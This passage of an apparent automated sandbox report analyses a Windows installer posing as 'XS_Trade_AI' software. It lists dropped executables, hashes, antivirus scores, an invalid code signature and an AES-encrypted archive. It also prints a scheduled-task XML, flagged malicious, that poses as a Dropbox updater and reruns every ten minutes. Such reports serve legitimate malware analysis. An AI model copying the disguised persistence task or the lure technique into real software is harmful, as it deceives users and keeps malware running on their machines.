                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................................x................q...................Rich...........PE..L...J:-a...........!......)...........).......)..............................pF.....?<E...@...........................?.......?.|.....C...............D.......C.0.....>.T.............................>.@.............)..............................text....).......)................. ..`.rdata...6....)..8....).............@..@.data.........@.......?.............@....rsrc.........C.......A.............@..@.reloc..0.....C.......A.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\select.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25320
                                                                                                                                            Entropy (8bit):6.533727727613444
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:KtbCEbBS3sEnqhrVusklI8mGgDG4yjshHZ:8bB4qNVusklI8mGsyjYZ
                                                                                                                                            MD5:E03B622ACBA9D02DC5A10364824EDE8C
                                                                                                                                            SHA1:40DB1A1A0D81C5D165D043502B1205B22BC238A4
                                                                                                                                            SHA-256:DE914028BFDDF19EF7279F04C92EF118C59B1BA8B5E27C76A7932E086BBC7978
                                                                                                                                            SHA-512:02ABE8C060A2E046E92DB4FDF5EFDEAF6A870703AD313D14D3E8A3A308CCA032C1D7B7AC40B0C346C0D8BF3193C42DFC69BF50450C9545D6BB6704FC0F5D3D5B
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............y..y..y......y...x..y...|..y...}..y...z..y.h.x..y...x..y..x...y.h.q..y.h.y..y.h...y.h.{..y.Rich.y.................PE..L...r:-a...........!.........&...............0.......................................9....@......................... ;..L...l;..x....`...............F.......p......d6..T............................6..@............0...............................text............................... ..`.rdata..6....0......."..............@..@.data........P.......6..............@....rsrc........`.......8..............@..@.reloc.......p.......B..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\unicodedata.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1115880
                                                                                                                                            Entropy (8bit):5.387181050869946
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:D13VQCb5Pfhnzr0ql9L8kUMmuZ63NKM7IRG5eeIDe6VZyrIBHdQLhfFE+Ck5t:D13jZV0m9suVMMREtIC6Vo4u8k5t
                                                                                                                                            MD5:FED3EC3AE0C349D65C0E90025B5507E6
                                                                                                                                            SHA1:3A1864A89C90D2837B77C6A1881263E9764FF8D3
                                                                                                                                            SHA-256:CE67BBA9B38FC6023D8EFDB06223B823CEB5B7C316DA48EA1EC9E404D05384A4
                                                                                                                                            SHA-512:87047F4B55C43D59FCD643879CC2CC6D03E18963E36D6C3F49AB37C8B8672B31F61ABD9AC1FAD732778FD02FB3D1E5308572C0297FB51E2FF7C8A26354C54C58
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.eb.f.1.f.1.f.1...1.f.1S..0.f.1S..0.f.1S..0.f.1S..0.f.1...0.f.1...0.f.1.f.1Ff.1...0.f.1...0.f.1...1.f.1...0.f.1Rich.f.1........PE..L...r:-a...........!.....H...........F.......`......................................e.....@.............................X...8...........................................T...........................p...@............`..4............................text...KF.......H.................. ..`.rdata..b~...`.......L..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-342QK.tmp\DontSleep_x64.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):530696
                                                                                                                                            Entropy (8bit):6.855729200155896
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:yHYkjGzb5GB95kZ+E8iKjwNxxNgaifafGuy+BYeA1fYSWCyXHgL74LisvJc7c8MB:UHjEv9BaL+ilYSUwLUvvJcI8MpX4PQlR
                                                                                                                                            MD5:8D0EEBD8F9083EE140B42321C1DC6FE5
                                                                                                                                            SHA1:E0260AD414DDEA10CB35F73E1B2F957A86AFBC39
                                                                                                                                            SHA-256:A3B964BE72190820662C59ACE07C39B75D0DB587EEAD01E87E5D43DDF6CDA51E
                                                                                                                                            SHA-512:B6B6E492F5F140DD6FF421944A8C4B75AC0743720192C4B1E7ACE0F0F38A5A9D2766C5A22C13B2BCFAE018EF29E0A0CBEB6BCA25F8CAC6DC944CDBD064B1A3CF
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{....................o...............................................Rich....................PE..d....L.g..........#...........................@..............................................................................................O..,.......0....P...E.......)...........................................................0...............................text............................... ..`.rdata...I...0...J... ..............@..@.data...h........&...j..............@....pdata...E...P...F..................@..@.rsrc...0...........................@..@........................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-342QK.tmp\_isetup\_setup64.tmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6144
                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-342QK.tmp\idp.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):237568
                                                                                                                                            Entropy (8bit):6.42067568634536
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:dnSx3lws+iWbUmJmE8dxMw7r+mjT5PbzEFwyGIyTcHY10tSB9j:IP0bUmQEUr+mRcbTx4N
                                                                                                                                            MD5:55C310C0319260D798757557AB3BF636
                                                                                                                                            SHA1:0892EB7ED31D8BB20A56C6835990749011A2D8DE
                                                                                                                                            SHA-256:54E7E0AD32A22B775131A6288F083ED3286A9A436941377FC20F85DD9AD983ED
                                                                                                                                            SHA-512:E0082109737097658677D7963CBF28D412DCA3FA8F5812C2567E53849336CE45EBAE2C0430DF74BFE16C0F3EEBB46961BC1A10F32CA7947692A900162128AE57
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)Wj.H99.H99.H99..D9.H99..W9.H99..T9-H99zGd9.H99.H894H99..K9.H99..C9.H99..E9.H99..A9.H99Rich.H99........................PE..L......W...........!................Nr..............................................0............................... ;......h/..d.......................................................................@............................................text...i........................... ..`.rdata...n.......p..................@..@.data....:...@... ...@..............@....rsrc................`..............@..@.reloc..b-.......0...p..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2530816
                                                                                                                                            Entropy (8bit):6.381531670528971
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:5fFRLtC2Y0SUQYZ4oVrbFoWmBOns67BeY:5tRLtHVr9mBz6
                                                                                                                                            MD5:797B09E2DCF988B4320DDCDD4CB936F0
                                                                                                                                            SHA1:9FFD65FFB2F1E890160A5377C71FD6E5B46C8EA3
                                                                                                                                            SHA-256:1A93F3E99AFAE583E7AD643C3A0850E7136CF727C6DEAD288F482214837F9B4C
                                                                                                                                            SHA-512:F3EE399D6F53C99CDA2FC058E3F1635CDFD6DFF778B92BF140B102CDB78461AEBB3060FFDB9B2481F6FE53B8B150FD2E83C5A1D4854CB1A0CC3B65FBE0A070AA
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...=.a\..................$...........$.......$...@...........................'...........@......@....................&.......%..5...0&..D................................................... &.....................D.%.@.....%......................text...P.$.......$................. ..`.itext...&....$..(....$............. ..`.data...$Z....$..\....$.............@....bss.....q...0%..........................idata...5....%..6....%.............@....didata.......%......L%.............@....edata........&......V%.............@..@.tls....D.....&..........................rdata..].... &......X%.............@..@.rsrc....D...0&..D...Z%.............@..@..............'.......&.............@..@........................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2530816
                                                                                                                                            Entropy (8bit):6.381531670528971
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:5fFRLtC2Y0SUQYZ4oVrbFoWmBOns67BeY:5tRLtHVr9mBz6
                                                                                                                                            MD5:797B09E2DCF988B4320DDCDD4CB936F0
                                                                                                                                            SHA1:9FFD65FFB2F1E890160A5377C71FD6E5B46C8EA3
                                                                                                                                            SHA-256:1A93F3E99AFAE583E7AD643C3A0850E7136CF727C6DEAD288F482214837F9B4C
                                                                                                                                            SHA-512:F3EE399D6F53C99CDA2FC058E3F1635CDFD6DFF778B92BF140B102CDB78461AEBB3060FFDB9B2481F6FE53B8B150FD2E83C5A1D4854CB1A0CC3B65FBE0A070AA
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...=.a\..................$...........$.......$...@...........................'...........@......@....................&.......%..5...0&..D................................................... &.....................D.%.@.....%......................text...P.$.......$................. ..`.itext...&....$..(....$............. ..`.data...$Z....$..\....$.............@....bss.....q...0%..........................idata...5....%..6....%.............@....didata.......%......L%.............@....edata........&......V%.............@..@.tls....D.....&..........................rdata..].... &......X%.............@..@.rsrc....D...0&..D...Z%.............@..@..............'.......&.............@..@........................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):530696
                                                                                                                                            Entropy (8bit):6.855729200155896
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:yHYkjGzb5GB95kZ+E8iKjwNxxNgaifafGuy+BYeA1fYSWCyXHgL74LisvJc7c8MB:UHjEv9BaL+ilYSUwLUvvJcI8MpX4PQlR
                                                                                                                                            MD5:8D0EEBD8F9083EE140B42321C1DC6FE5
                                                                                                                                            SHA1:E0260AD414DDEA10CB35F73E1B2F957A86AFBC39
                                                                                                                                            SHA-256:A3B964BE72190820662C59ACE07C39B75D0DB587EEAD01E87E5D43DDF6CDA51E
                                                                                                                                            SHA-512:B6B6E492F5F140DD6FF421944A8C4B75AC0743720192C4B1E7ACE0F0F38A5A9D2766C5A22C13B2BCFAE018EF29E0A0CBEB6BCA25F8CAC6DC944CDBD064B1A3CF
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{....................o...............................................Rich....................PE..d....L.g..........#...........................@..............................................................................................O..,.......0....P...E.......)...........................................................0...............................text............................... ..`.rdata...I...0...J... ..............@..@.data...h........&...j..............@....pdata...E...P...F..................@..@.rsrc...0...........................@..@........................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.zip

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7108996
                                                                                                                                            Entropy (8bit):7.9999745140648875
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:196608:Oz9B4c63TsMQ074VDumTF3U9I2wICUVUdewV87G7F:OJBhslxMDNtIORqg87kF
                                                                                                                                            MD5:AC1A1590A3314BBC85E1DF5EFA33B060
                                                                                                                                            SHA1:9D8FF07D2417B4318ECDFB099C82E1A0EA6CDD5B
                                                                                                                                            SHA-256:8B10C5EE19274CC7CE7B85B8A7ACA8F8D1AEDB5031A08F7053412298AEC5D927
                                                                                                                                            SHA-512:A66ECAC1949F25460FE3FCAEE8A2511475DD61B753474B9B75CFFAF9B817FA7E6D52EA918F6104379BA48639B38E99B44846291885AE873F435268EC1FE34F20
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:PK..3...c...[Y.....xl...o.....yyttrsu.exe......AE...v>..|.~2.Vz9...S.7...:&.....M.%..D......j..................._.B..t../.3./...,.Ot.k..|...6.5..:<..GJ.....a.~.V...c.W........... S..~HH..A`oX.`:.y.W....%...S...0...._.....3........nn...r.O=|..3..D/D...7...4.8._.k/+"..xC..........w*.W........\x.=.Vfh...:......t.....i..6..;X.E9t.)...JL....j6HM...j...'.lU..e>/WK9.4.E..l.S.72.z05..lEe..#.~.`.....Sjk.....1.L.......P._....d..zX...Y.H?.z........C.p...K.N.h....Q..\.e..85..!.G...C6s.JA.]`...hX.(F...4|ij...t......(.[.l.....44.A}.fW.*......1&......w9.d..2..o..Q.Z[#..PS9..-.0..#.~..s.....-.....O......0.o...~Gh....4....G...X.....}......n#.4x..<..<...;o...r.)8|].[.3..V]92.....w..c....Z........f.'..Ml...]2.Q....o....!.k..'v].@.,.X+..~o.$.-.2Kgra.......X}#....a...b.Pz<.L"..P..C.*......B..[.b....48..eM.g:.*=H.......l)..f.r.y.+.'.8.i%.y.v...K.....p..9.fI.T..7!\jB;..|.d..]].~...".7.wc.q;;..F.o.!....Y..JUW4?JUK..-."...(..3.V{R-k.2...<.....u.aL...Z...Z...?..A...y.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\_isetup\_setup64.tmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6144
                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):237568
                                                                                                                                            Entropy (8bit):6.42067568634536
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:dnSx3lws+iWbUmJmE8dxMw7r+mjT5PbzEFwyGIyTcHY10tSB9j:IP0bUmQEUr+mRcbTx4N
                                                                                                                                            MD5:55C310C0319260D798757557AB3BF636
                                                                                                                                            SHA1:0892EB7ED31D8BB20A56C6835990749011A2D8DE
                                                                                                                                            SHA-256:54E7E0AD32A22B775131A6288F083ED3286A9A436941377FC20F85DD9AD983ED
                                                                                                                                            SHA-512:E0082109737097658677D7963CBF28D412DCA3FA8F5812C2567E53849336CE45EBAE2C0430DF74BFE16C0F3EEBB46961BC1A10F32CA7947692A900162128AE57
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)Wj.H99.H99.H99..D9.H99..W9.H99..T9-H99zGd9.H99.H894H99..K9.H99..C9.H99..E9.H99..A9.H99Rich.H99........................PE..L......W...........!................Nr..............................................0............................... ;......h/..d.......................................................................@............................................text...i........................... ..`.rdata...n.......p..................@..@.data....:...@... ...@..............@....rsrc................`..............@..@.reloc..b-.......0...p..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):847360
                                                                                                                                            Entropy (8bit):6.655399003035542
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:N5Oh3oXwjoThmYgKmRCcBcIGvymfIRNM9+1nG0:Ng9ogjoVsRlBAPV+40
                                                                                                                                            MD5:6482EE0F372469D1190C74BD70D76153
                                                                                                                                            SHA1:9001213D28E5B0B18AA24114A38A1EFE1A767698
                                                                                                                                            SHA-256:4B7FC7818F3168945DBEDADCFD7AAF470B88543EF6B685619AD1C942AC3B1DED
                                                                                                                                            SHA-512:6A5C2BDF58CD8DEADF51302D8F8B17A14908809EF700A1E366E7D107B1E22ABE8CAF1F68E7EB9D35E9B519793699C3492323F6577C3569A56AC3C845516625F3
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........................r...........................l...r..........1....<............#'....i......6.....Rich..........................PE..L...0DCf.............................U............@.......................................@..................................j..x....`.......................p..0g......................................................P............................text............................... ..`.rdata...g.......h..................@..@.data................f..............@....sxdata......P.......n..............@....rsrc........`.......p..............@..@.reloc...u...p...v...x..............@..B................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (321)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1836
                                                                                                                                            Entropy (8bit):4.976117259434148
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:cqhUwAbXxsK7vYuFdOFQO033ODOiQdKrZuTYcv:lhUvYuFdOFQOMdKrZuZ
                                                                                                                                            MD5:3B988A294EC66002BDD6B23074122541
                                                                                                                                            SHA1:4322BC5F4E20EACFB19CC4E2B35A8D5701694833
                                                                                                                                            SHA-256:B265D168589A6B1E5C4F54ADEB14666E2A3CC182DC1B400237E03CD19F26339F
                                                                                                                                            SHA-512:00D9A35D9AFA9177AAB78485173DD9CFAD1EC641E219A25326E9BF01968FD60994398745D9AFE6F869B4C2E14E8AE962203090069285ED6C58856DE9D6C8616F
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Description>Keeps your Dropbox software up to date. If this task is disabled or stopped, your Dropbox software will not be kept up to date, meaning security vulnerabilities that may arise cannot be fixed and features may not work. This task uninstalls itself when there is no Dropbox software using it.</Description>. </RegistrationInfo>. <Triggers>. <TimeTrigger>. <Repetition>. <Interval>PT10M</Interval>. <StopAtDurationEnd>false</StopAtDurationEnd>. </Repetition>. <StartBoundary>2023-08-10T00:00:00</StartBoundary>. <Enabled>true</Enabled>. </TimeTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>IgnoreNew</MultipleInstances

                                                                                                                                            \Device\ConDrv

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe
                                                                                                                                            File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):538
                                                                                                                                            Entropy (8bit):5.1112184726268675
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:pt6wnRwsfDLsyTAfRtmFyYfRtcWJA1tNqj:ptfwsfDLsyTAfbmTfbcWJAv6
                                                                                                                                            MD5:D780E3A83DEE11439F7288939F012FB0
                                                                                                                                            SHA1:70EE8F9B47D1F06923379539F8FCFBBE4F874286
                                                                                                                                            SHA-256:1826FA126CA1E5B9520072CD60711B673A55BCA4A98F2D5E5FD9FE0739929764
                                                                                                                                            SHA-512:95EEC98F76438CCDF05BEDF30D266FD63EA258D507595C8CE77E501375794F53B64ECF7A9DE57D850F7D1DBEFFFCDF27F62189A8993A7E498CE2BFB67CAC6462
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..7-Zip (a) 24.05 (x86) : Copyright (c) 1999-2024 Igor Pavlov : 2024-05-14....Scanning the drive for archives:.. 0M Scan C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\. .1 file, 7108996 bytes (6943 KiB)....Extracting archive: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.zip..--..Path = C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.zip..Type = zip..Physical Size = 7108996.... 0%. .Everything is Ok....Size: 7278842..Compressed: 7108996..

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):7.774088787923903
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 98.04%
                                                                                                                                            • Inno Setup installer (109748/4) 1.08%
                                                                                                                                            • InstallShield setup (43055/19) 0.42%
                                                                                                                                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                            File name:XS_Trade_AI-newest_release_.exe
                                                                                                                                            File size:2'528'268 bytes
                                                                                                                                            MD5:869366922ec1233b2fd7adacb0ce27c3
                                                                                                                                            SHA1:8980ef4149a7b3f357f9d114735e9797cd607e84
                                                                                                                                            SHA256:a0041464eaecdb08119b38f377c919e512610307cd7f994aba11c02112fb6777
                                                                                                                                            SHA512:7d4095e6cac86713dd3354c99b23b7455e472ce7966cf774b797081dd4ac0da493b732429cd47c41faa11bd14415b7f33ce2ff94fffbebdd5af6fee958808713
                                                                                                                                            SSDEEP:49152:bcW4fc5du6I0Tz5x5xZzOIf54pe+ZGUFSawC94yXf:bX4k5dhlJLbzOa4peeRF14yv
                                                                                                                                            TLSH:8AC5E127B298A53EC4AA27350673B01058FBB66DF417BE1677F4C48CCF664C01E3AA65
                                                                                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:2d2e3797b32b2b99

                                                                                                                                            Static PE Info

                                                                                                                                            General

                                                                                                                                            Entrypoint:0x4a7ed0
                                                                                                                                            Entrypoint Section:.itext
                                                                                                                                            Digitally signed:true
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x5C61BB3C [Mon Feb 11 18:13:16 2019 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:6
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:6
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:6
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:eb5bc6ff6263b364dfbfb78bdb48ed59

                                                                                                                                            Authenticode Signature

                                                                                                                                            Signature Valid:false
                                                                                                                                            Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                            Error Number:-2146869232
                                                                                                                                            Not Before, Not After
                                                                                                                                            • 24/07/2024 06:16:20 27/08/2026 10:33:53
                                                                                                                                            Subject Chain
                                                                                                                                            • E=support@softwareok.com, CN=Nenad Hrg, O=Nenad Hrg, STREET=Edelweissstr. 104, L=Taufkirchen, S=Bayern, C=DE, OID.1.3.6.1.4.1.311.60.2.1.1=Taufkirchen, OID.1.3.6.1.4.1.311.60.2.1.2=Bayern, OID.1.3.6.1.4.1.311.60.2.1.3=DE, SERIALNUMBER=2016, OID.2.5.4.15=Private Organization
                                                                                                                                            Version:3
                                                                                                                                            Thumbprint MD5:02FA1932AC9D3D360F3D0323CCDA30EC
                                                                                                                                            Thumbprint SHA-1:0181DA2D78A2EC6E6966C59A0A663E9D8F0C2F93
                                                                                                                                            Thumbprint SHA-256:AD02A24C8D2FFBC5F7E946048F23967690A9EE43C5B6842093AD345CA83FB7B5
                                                                                                                                            Serial:688627716A10C6EBD3648632

                                                                                                                                            Entrypoint Preview

                                                                                                                                            Instruction
                                                                                                                                            push ebp
                                                                                                                                            mov ebp, esp
                                                                                                                                            add esp, FFFFFFA4h
                                                                                                                                            push ebx
                                                                                                                                            push esi
                                                                                                                                            push edi
                                                                                                                                            xor eax, eax
                                                                                                                                            mov dword ptr [ebp-3Ch], eax
                                                                                                                                            mov dword ptr [ebp-40h], eax
                                                                                                                                            mov dword ptr [ebp-5Ch], eax
                                                                                                                                            mov dword ptr [ebp-30h], eax
                                                                                                                                            mov dword ptr [ebp-38h], eax
                                                                                                                                            mov dword ptr [ebp-34h], eax
                                                                                                                                            mov dword ptr [ebp-2Ch], eax
